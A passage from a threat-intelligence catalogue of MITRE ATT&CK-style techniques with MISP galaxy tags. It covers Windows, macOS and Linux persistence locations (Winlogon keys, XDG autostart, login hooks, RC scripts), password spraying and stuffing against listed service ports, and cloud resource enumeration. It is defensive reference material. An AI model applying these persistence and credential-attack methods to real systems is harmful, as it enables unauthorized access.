Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.<sup>[[Github W32Time Oct 2017](https://app.tidalcyber.com/references/a248fd87-c3c1-4de7-a9af-0436a10f71aa)]</sup>

The tag is: misp-galaxy:technique="Time Providers"

Winlogon Helper DLL

Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in <code>HKLM\Software[\\Wow6432Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\</code> and <code>HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\</code> are used to manage additional helper programs and functionalities that support Winlogon.<sup>[[Cylance Reg Persistence Sept 2013](https://app.tidalcyber.com/references/9e9c745f-19fd-4218-b8dc-85df804ecb70)]</sup>

Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: <sup>[[Cylance Reg Persistence Sept 2013](https://app.tidalcyber.com/references/9e9c745f-19fd-4218-b8dc-85df804ecb70)]</sup>

  • Winlogon\Notify - points to notification package DLLs that handle Winlogon events

  • Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on

  • Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on

Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.

The tag is: misp-galaxy:technique="Winlogon Helper DLL"

XDG Autostart Entries

Adversaries may add or modify XDG Autostart Entries to execute malicious programs or commands when a user’s desktop environment is loaded at login. XDG Autostart entries are available for any XDG-compliant Linux system. XDG Autostart entries use Desktop Entry files (.desktop) to configure the user’s desktop environment upon user login. These configuration files determine what applications launch upon user login, define associated applications to open specific file types, and define applications used to open removable media.<sup>[[Free Desktop Application Autostart Feb 2006](https://app.tidalcyber.com/references/0885434e-3908-4425-9597-ce6abe531ca5)]</sup><sup>[[Free Desktop Entry Keys](https://app.tidalcyber.com/references/4ffb9866-1cf4-46d1-b7e5-d75bd98de018)]</sup>

Adversaries may abuse this feature to establish persistence by adding a path to a malicious binary or command to the Exec directive in the .desktop configuration file. When the user’s desktop environment is loaded at user login, the .desktop files located in the XDG Autostart directories are automatically executed. System-wide Autostart entries are located in the /etc/xdg/autostart directory while the user entries are located in the ~/.config/autostart directory.

Adversaries may combine this technique with [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to blend malicious Autostart entries with legitimate programs.<sup>[[Red Canary Netwire Linux 2022](https://app.tidalcyber.com/references/6d4c6c52-38ae-52f5-b438-edeceed446a5)]</sup>

The tag is: misp-galaxy:technique="XDG Autostart Entries"

Boot or Logon Autostart Execution

Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.<sup>[[Microsoft Run Key](https://app.tidalcyber.com/references/0d633a50-4afd-4479-898e-1a785f5637da)]</sup><sup>[[MSDN Authentication Packages](https://app.tidalcyber.com/references/e9bb8434-9b6d-4301-bfe2-5c83ceabb020)]</sup><sup>[[Microsoft TimeProvider](https://app.tidalcyber.com/references/cf7c1db8-6282-4ccd-9609-5a012faf70d6)]</sup><sup>[[Cylance Reg Persistence Sept 2013](https://app.tidalcyber.com/references/9e9c745f-19fd-4218-b8dc-85df804ecb70)]</sup><sup>[[Linux Kernel Programming](https://app.tidalcyber.com/references/70f31f19-e0b3-40b1-b8dd-6667557bb334)]</sup> These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.

Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.

The tag is: misp-galaxy:technique="Boot or Logon Autostart Execution"

Login Hook

Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the <code>/Library/Preferences/com.apple.loginwindow.plist</code> file and can be modified using the <code>defaults</code> command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissions to modify or create hooks.<sup>[[Login Scripts Apple Dev](https://app.tidalcyber.com/references/9c0094b6-a8e3-4f4d-8d2e-33b408d44a06)]</sup><sup>[[LoginWindowScripts Apple Dev](https://app.tidalcyber.com/references/340eb8df-cc22-4b59-8dca-32ec52fd6818)]</sup>

Adversaries can add or insert a path to a malicious script in the <code>com.apple.loginwindow.plist</code> file, using the <code>LoginHook</code> or <code>LogoutHook</code> key-value pair. The malicious script is executed upon the next user login. If a login hook already exists, adversaries can add additional commands to an existing login hook. There can be only one login and logout hook on a system at a time.<sup>[[S1 macOs Persistence](https://app.tidalcyber.com/references/ce952a0d-9c0d-4a51-9564-7cc5d9e43e2c)]</sup><sup>[[Wardle Persistence Chapter](https://app.tidalcyber.com/references/6272b9a2-d704-43f3-9e25-6c434bb5d1ef)]</sup>

Note: Login hooks were deprecated in 10.11 version of macOS in favor of [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27) and [Launch Agent](https://app.tidalcyber.com/technique/6dbe030c-5f87-4b45-9b6b-5bba2c0fad00)

The tag is: misp-galaxy:technique="Login Hook"

Logon Script (Windows)

Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.<sup>[[TechNet Logon Scripts](https://app.tidalcyber.com/references/896cf5dd-3fe7-44ab-bbaf-d8b2b9980dca)]</sup> This is done via adding a path to a script to the <code>HKCU\Environment\UserInitMprLogonScript</code> Registry key.<sup>[[Hexacorn Logon Scripts](https://app.tidalcyber.com/references/bdcdfe9e-1f22-4472-9a86-faefcb5c5618)]</sup>

Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.

The tag is: misp-galaxy:technique="Logon Script (Windows)"

Network Logon Script

Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects.<sup>[[Petri Logon Script AD](https://app.tidalcyber.com/references/1de42b0a-3dd6-4f75-bcf3-a2373e349a39)]</sup> These logon scripts run with the privileges of the user they are assigned to. Depending on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems.

Adversaries may use these scripts to maintain persistence on a network. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.

The tag is: misp-galaxy:technique="Network Logon Script"

RC Scripts

Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.

Adversaries can establish persistence by adding a malicious binary path or shell commands to <code>rc.local</code>, <code>rc.common</code>, and other RC scripts specific to the Unix-like distribution.<sup>[[IranThreats Kittens Dec 2017](https://app.tidalcyber.com/references/8338ad75-89f2-47d8-b85b-7cbf331bd7cd)]</sup><sup>[[Intezer HiddenWasp Map 2019](https://app.tidalcyber.com/references/dfef8451-031b-42a6-8b78-d25950cc9d23)]</sup> Upon reboot, the system executes the script’s contents as root, resulting in persistence.

Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.<sup>[[intezer-kaiji-malware](https://app.tidalcyber.com/references/ef1fbb40-da6f-41d0-a44a-9ff444e2ad89)]</sup>

Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://app.tidalcyber.com/technique/). <sup>[[Apple Developer Doco Archive Launchd](https://app.tidalcyber.com/references/41311827-3d81-422a-9b07-ee8ddc2fc7f1)]</sup><sup>[[Startup Items](https://app.tidalcyber.com/references/e36dd211-22e4-4b23-befb-fbfe1a84b866)]</sup> This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.<sup>[[Methods of Mac Malware Persistence](https://app.tidalcyber.com/references/44154472-2894-4161-b23f-46d1b1fd6772)]</sup> To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.<sup>[[Ubuntu Manpage systemd rc](https://app.tidalcyber.com/references/6be16aba-a37f-49c4-9a36-51d2676f64e6)]</sup>

The tag is: misp-galaxy:technique="RC Scripts"

Startup Items

Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.<sup>[[Startup Items](https://app.tidalcyber.com/references/e36dd211-22e4-4b23-befb-fbfe1a84b866)]</sup>

This is technically a deprecated technology (superseded by [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27)), and thus the appropriate folder, <code>/Library/StartupItems</code> isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), <code>StartupParameters.plist</code>, reside in the top-level directory.

An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism.<sup>[[Methods of Mac Malware Persistence](https://app.tidalcyber.com/references/44154472-2894-4161-b23f-46d1b1fd6772)]</sup> Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.

The tag is: misp-galaxy:technique="Startup Items"

Boot or Logon Initialization Scripts

Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely.

Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.

An adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.

The tag is: misp-galaxy:technique="Boot or Logon Initialization Scripts"

Browser Extensions

Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser’s app store and generally have access and permissions to everything that the browser can access.<sup>[[Wikipedia Browser Extension](https://app.tidalcyber.com/references/52aef082-3f8e-41b4-af95-6631ce4c9e91)]</sup><sup>[[Chrome Extensions Definition](https://app.tidalcyber.com/references/fe00cee9-54d9-4775-86da-b7db73295bf7)]</sup>

Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.<sup>[[Malicious Chrome Extension Numbers](https://app.tidalcyber.com/references/f34fcf1f-370e-4b6e-9cc4-7ee4075faf6e)]</sup> Depending on the browser, adversaries may also manipulate an extension’s update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions.

Previous to macOS 11, adversaries could silently install browser extensions via the command line using the <code>profiles</code> tool to install malicious <code>.mobileconfig</code> files. In macOS 11+, the use of the <code>profiles</code> tool can no longer install configuration profiles, however <code>.mobileconfig</code> files can be planted and installed with user interaction.<sup>[[xorrior chrome extensions macOS](https://app.tidalcyber.com/references/84bfd3a1-bda2-4821-ac52-6af8515e5879)]</sup>

Once the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.<sup>[[Chrome Extension Crypto Miner](https://app.tidalcyber.com/references/ae28f530-40da-451e-89b8-b472340c3e0a)]</sup><sup>[[ICEBRG Chrome Extensions](https://app.tidalcyber.com/references/459bfd4a-7a9b-4d65-b574-acb221428dad)]</sup><sup>[[Banker Google Chrome Extension Steals Creds](https://app.tidalcyber.com/references/93f37adc-d060-4b35-9a4d-62d2ad61cdf3)]</sup><sup>[[Catch All Chrome Extension](https://app.tidalcyber.com/references/eddd2ea8-89c1-40f9-b6e3-37cbdebd210e)]</sup>

There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.<sup>[[Stantinko Botnet](https://app.tidalcyber.com/references/d81e0274-76f4-43ce-b829-69f761e280dc)]</sup> There have also been similar examples of extensions being used for command & control.<sup>[[Chrome Extension C2 Malware](https://app.tidalcyber.com/references/b0fdf9c7-614b-4269-ba3e-7d8b02aa8502)]</sup>

The tag is: misp-galaxy:technique="Browser Extensions"

Browser Information Discovery

Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.<sup>[[Kaspersky Autofill](https://app.tidalcyber.com/references/561ff84d-17ce-511c-af0c-059310f3c129)]</sup>

Browser information may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://app.tidalcyber.com/technique/838c5038-91e7-4648-925e-a142c8c10853) associated with logins cached by a browser.

Specific storage locations vary based on platform and/or application, but browser information is typically stored in local files and databases (e.g., %APPDATA%/Google/Chrome).<sup>[[Chrome Roaming Profiles](https://app.tidalcyber.com/references/cf0bb77d-c7f7-515b-9217-ba9120cdddec)]</sup>

The tag is: misp-galaxy:technique="Browser Information Discovery"

Browser Session Hijacking

Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.<sup>[[Wikipedia Man in the Browser](https://app.tidalcyber.com/references/f8975da7-4c50-4b3b-8ecb-c99c9b3bc20c)]</sup>

A specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser as a way to pivot into an authenticated intranet.<sup>[[Cobalt Strike Browser Pivot](https://app.tidalcyber.com/references/0c1dd453-7281-4ee4-9c8f-bdc401cf48d7)]</sup><sup>[[ICEBRG Chrome Extensions](https://app.tidalcyber.com/references/459bfd4a-7a9b-4d65-b574-acb221428dad)]</sup> Executing browser-based behaviors such as pivoting may require specific process permissions, such as <code>SeDebugPrivilege</code> and/or high-integrity/administrator rights.

Another example involves pivoting browser traffic from the adversary’s browser through the user’s browser by setting up a proxy which will redirect web traffic. This does not alter the user’s traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as [Sharepoint](https://app.tidalcyber.com/technique/8ac6952d-5add-4cbc-ad39-44943ed3459b) or webmail, that is accessible through the browser and which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.<sup>[[cobaltstrike manual](https://app.tidalcyber.com/references/43277d05-0aa4-4cee-ac41-6f03a49851a9)]</sup>

The tag is: misp-galaxy:technique="Browser Session Hijacking"

Credential Stuffing

Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.

Credential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization’s login failure policies.

Typically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following:

  • SSH (22/TCP)

  • Telnet (23/TCP)

  • FTP (21/TCP)

  • NetBIOS / SMB / Samba (139/TCP & 445/TCP)

  • LDAP (389/TCP)

  • Kerberos (88/TCP)

  • RDP / Terminal Services (3389/TCP)

  • HTTP/HTTP Management Services (80/TCP & 443/TCP)

  • MSSQL (1433/TCP)

  • Oracle (1521/TCP)

  • MySQL (3306/TCP)

  • VNC (5900/TCP)

In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.<sup>[[US-CERT TA18-068A 2018](https://app.tidalcyber.com/references/d9992f57-8ff3-432f-b445-937ff4a6ebf9)]</sup>

The tag is: misp-galaxy:technique="Credential Stuffing"

Password Cracking

Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d) can be used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://app.tidalcyber.com/technique/33486e3e-1104-42d0-8053-34c8c9c4d10f) is not an option. Further, adversaries may leverage [Data from Configuration Repository](https://app.tidalcyber.com/technique/97ef6135-47d4-4b91-8783-c0b5f331340e) in order to obtain hashed credentials for network devices.<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup>

Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.<sup>[[Wikipedia Password cracking](https://app.tidalcyber.com/references/d5ebb79f-b39a-46cb-b546-2db383783a58)]</sup> The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access.

The tag is: misp-galaxy:technique="Password Cracking"

Password Guessing

Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target’s policies on password complexity or use policies that may lock accounts out after a number of failed attempts.

Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization’s login failure policies. <sup>[[Cylance Cleaver](https://app.tidalcyber.com/references/f0b45225-3ec3-406f-bd74-87f24003761b)]</sup>

Typically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following:

  • SSH (22/TCP)

  • Telnet (23/TCP)

  • FTP (21/TCP)

  • NetBIOS / SMB / Samba (139/TCP & 445/TCP)

  • LDAP (389/TCP)

  • Kerberos (88/TCP)

  • RDP / Terminal Services (3389/TCP)

  • HTTP/HTTP Management Services (80/TCP & 443/TCP)

  • MSSQL (1433/TCP)

  • Oracle (1521/TCP)

  • MySQL (3306/TCP)

  • VNC (5900/TCP)

  • SNMP (161/UDP and 162/TCP/UDP)

In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.<sup>[[US-CERT TA18-068A 2018](https://app.tidalcyber.com/references/d9992f57-8ff3-432f-b445-937ff4a6ebf9)]</sup>. Further, adversaries may abuse network device interfaces (such as wlanAPI) to brute force accessible wifi-router(s) via wireless authentication protocols.<sup>[[Trend Micro Emotet 2020](https://app.tidalcyber.com/references/150327e6-db4b-4588-8cf2-ee131569150b)]</sup>

In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.

The tag is: misp-galaxy:technique="Password Guessing"

Password Spraying

Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. <sup>[[BlackHillsInfosec Password Spraying](https://app.tidalcyber.com/references/f45c7a4b-dafc-4e5c-ad3f-db4b0388a1d7)]</sup>

Typically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:

  • SSH (22/TCP)

  • Telnet (23/TCP)

  • FTP (21/TCP)

  • NetBIOS / SMB / Samba (139/TCP & 445/TCP)

  • LDAP (389/TCP)

  • Kerberos (88/TCP)

  • RDP / Terminal Services (3389/TCP)

  • HTTP/HTTP Management Services (80/TCP & 443/TCP)

  • MSSQL (1433/TCP)

  • Oracle (1521/TCP)

  • MySQL (3306/TCP)

  • VNC (5900/TCP)

In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.<sup>[[US-CERT TA18-068A 2018](https://app.tidalcyber.com/references/d9992f57-8ff3-432f-b445-937ff4a6ebf9)]</sup>

In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.

The tag is: misp-galaxy:technique="Password Spraying"

Brute Force

Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.

Brute forcing credentials may take place at various points during a breach. For example, adversaries may attempt to brute force access to [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) within a victim environment leveraging knowledge gathered from other post-compromise behaviors such as [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d), [Account Discovery](https://app.tidalcyber.com/technique/6736995e-b9ea-401b-81fa-6caeb7a17ce3), or [Password Policy Discovery](https://app.tidalcyber.com/technique/2bf2e498-99c8-4e36-ad4b-e675d95ac925). Adversaries may also combine brute forcing activity with behaviors such as [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) as part of Initial Access.

The tag is: misp-galaxy:technique="Brute Force"

Build Image on Host

Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote <code>build</code> request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.<sup>[[Docker Build Image](https://app.tidalcyber.com/references/ee708b64-57f3-4b47-af05-1e26b698c21f)]</sup>

An adversary may take advantage of that <code>build</code> API to build a custom image on the host that includes malware downloaded from their C2 server, and then they may utilize [Deploy Container](https://app.tidalcyber.com/technique/2618638c-f6bd-4840-a297-c45076e094a9) using that custom image.<sup>[[Aqua Build Images on Hosts](https://app.tidalcyber.com/references/efd64f41-13cc-4b2b-864c-4d2352cdadcd)]</sup><sup>[[Aqua Security Cloud Native Threat Report June 2021](https://app.tidalcyber.com/references/be9652d5-7531-4143-9c44-aefd019b7a32)]</sup> If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment.

The tag is: misp-galaxy:technique="Build Image on Host"

Clipboard Data

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

For example, on Windows adversaries can access clipboard data by using <code>clip.exe</code> or <code>Get-Clipboard</code>.<sup>[[MSDN Clipboard](https://app.tidalcyber.com/references/2c1b2d58-a5dc-4aee-8bdb-129a81c10408)]</sup><sup>[[clip_win_server](https://app.tidalcyber.com/references/8a961fa1-def0-5efe-8599-62e884d4ea22)]</sup><sup>[[CISA_AA21_200B](https://app.tidalcyber.com/references/633c6045-8990-58ae-85f0-00139aa9a091)]</sup> Additionally, adversaries may monitor then replace users’ clipboard with their data (e.g., [Transmitted Data Manipulation]([mining_ruby_reversinglabs(https://app.tidalcyber.com/references/ca2074d8-330b-544e-806f-ddee7b702631)]</sup>

macOS and Linux also have commands, such as <code>pbpaste</code>, to grab clipboard contents.<sup>[[Operating with EmPyre](https://app.tidalcyber.com/references/459a4ad5-0e28-4bfc-a73e-b9dd516d516f)]</sup>

The tag is: misp-galaxy:technique="Clipboard Data"

Cloud Administration Command

Adversaries may abuse cloud management services to execute commands within virtual machines or hybrid-joined devices. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. Similarly, in Azure AD environments, Microsoft Endpoint Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to the Azure AD.<sup>[[AWS Systems Manager Run Command](https://app.tidalcyber.com/references/ef66f17b-6a5b-5eb8-83de-943e2bddd114)]</sup><sup>[[Microsoft Run Command](https://app.tidalcyber.com/references/4f2e6adb-6e3d-5f1f-b873-4b99797f2bfa)]</sup><sup>[[SpecterOps Lateral Movement from Azure to On-Prem AD 2020](https://app.tidalcyber.com/references/eb97d3d6-21cb-5f27-9a78-1e8576acecdc)]</sup>

If an adversary gains administrative access to a cloud environment, they may be able to abuse cloud management services to execute commands in the environment’s virtual machines or on-premises hybrid-joined devices. Additionally, an adversary that compromises a service provider or delegated administrator account may similarly be able to leverage a [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf) to execute commands in connected virtual machines.<sup>[[MSTIC Nobelium Oct 2021](https://app.tidalcyber.com/references/7b6cc308-9871-47e5-9039-a9a7e66ce373)]</sup>

The tag is: misp-galaxy:technique="Cloud Administration Command"

Cloud Infrastructure Discovery

An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.

Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.<sup>[[Amazon Describe Instance](https://app.tidalcyber.com/references/c0b6a8a4-0d94-414d-b5ab-cf5485240dee)]</sup><sup>[[Amazon Describe Instances API](https://app.tidalcyber.com/references/95629746-43d2-4f41-87da-4bd44a43ef4a)]</sup><sup>[[AWS Get Public Access Block](https://app.tidalcyber.com/references/f2887980-569a-4bc2-949e-bd8ff266c43c)]</sup><sup>[[AWS Head Bucket](https://app.tidalcyber.com/references/1388a78e-9f86-4927-a619-e0fcbac5b7a1)]</sup> Similarly, GCP’s Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project <sup>[[Google Compute Instances](https://app.tidalcyber.com/references/ae09e791-a00c-487b-b0e5-7768df0679a3)]</sup>, and Azure’s CLI command <code>az vm list</code> lists details of virtual machines.<sup>[[Microsoft AZ CLI](https://app.tidalcyber.com/references/cfd94553-272b-466b-becb-3859942bcaa5)]</sup> In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning]([Malwarebytes OSINT Leaky Buckets - Hioureas(https://app.tidalcyber.com/references/67ebcf71-828e-4202-b842-f071140883f8)]</sup>

An adversary may enumerate resources using a compromised user’s access keys to determine which are available to that user.<sup>[[Expel IO Evil in AWS](https://app.tidalcyber.com/references/4c2424d6-670b-4db0-a752-868b4c954e29)]</sup> The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.<sup>[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]</sup>An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. <sup>[[AWS Describe DB Instances](https://app.tidalcyber.com/references/85bda17d-7b7c-4d0e-a0d2-2adb5f0a6b82)]</sup> Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://app.tidalcyber.com/technique/5d0a3722-52b6-4968-a367-7ca6bc9a33fc), this technique focuses on the discovery of components of the provided services rather than the services themselves.

The tag is: misp-galaxy:technique="Cloud Infrastructure Discovery"

Cloud Service Dashboard

An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.<sup>[[Google Command Center Dashboard](https://app.tidalcyber.com/references/a470fe2a-40ce-4060-8dfc-2cdb56bbc18b)]</sup>

Depending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests.

The tag is: misp-galaxy:technique="Cloud Service Dashboard"

Cloud Service Discovery

An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.

Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.<sup>[[Azure - Resource Manager API](https://app.tidalcyber.com/references/223cc020-e88a-4236-9c34-64fe606a1729)]</sup><sup>[[Azure AD Graph API](https://app.tidalcyber.com/references/fed0fef5-e366-4e24-9554-0599744cd1c6)]</sup>

For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.<sup>[[Azure - Stormspotter](https://app.tidalcyber.com/references/42383ed1-9705-4313-8068-28a22a23f50e)]</sup><sup>[[GitHub Pacu](https://app.tidalcyber.com/references/bda43b1b-ea8d-4371-9984-6d8a7cc24965)]</sup>

Adversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through [Disable or Modify Tools](https://app.tidalcyber.com/technique/9f290216-b2ab-47b5-b9ae-a94ae6d357c6) or [Disable or Modify Cloud Logs](https://app.tidalcyber.com/technique/6824cdb3-a4c5-45a8-a3d5-5a5afd347214).

The tag is: misp-galaxy:technique="Cloud Service Discovery"

Cloud Storage Object Discovery

